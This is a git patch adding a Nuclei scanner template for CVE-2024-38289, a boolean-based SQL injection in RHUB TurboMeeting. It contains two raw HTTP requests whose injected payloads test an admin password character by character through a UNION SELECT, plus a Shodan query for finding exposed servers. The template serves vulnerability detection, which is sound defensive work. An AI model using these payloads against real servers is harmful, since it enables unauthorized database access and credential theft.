From 20b4dff4df1d93054c6107d3965bf6ab7fbb4765 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 25 Jul 2024 17:31:51 +0530 Subject: [PATCH] Create CVE-2024-38289.yaml --- http/cves/2024/CVE-2024-38289.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-38289.yaml diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml new file mode 100644 index 0000000000..81ad678b22 --- /dev/null +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-38289 + +info: + name: TurboMeeting - Boolean-based SQL Injection + author: rootxharsh,iamnoooob,pdresearch + severity: critical + description: | + A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server. + reference: + - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v + metadata: + verified: true + max-request: 2 + shodan-query: html:"TurboMeeting" + tags: cve,cve2024,sqli,turbomeeting + +http: + - raw: + - | + POST /as/wapi/vmp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** + + - | + POST /as/wapi/vmp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '<__Status__>SUCCEED' + + - type: word + part: body_2 + words: + - '<__Status__>FAILED'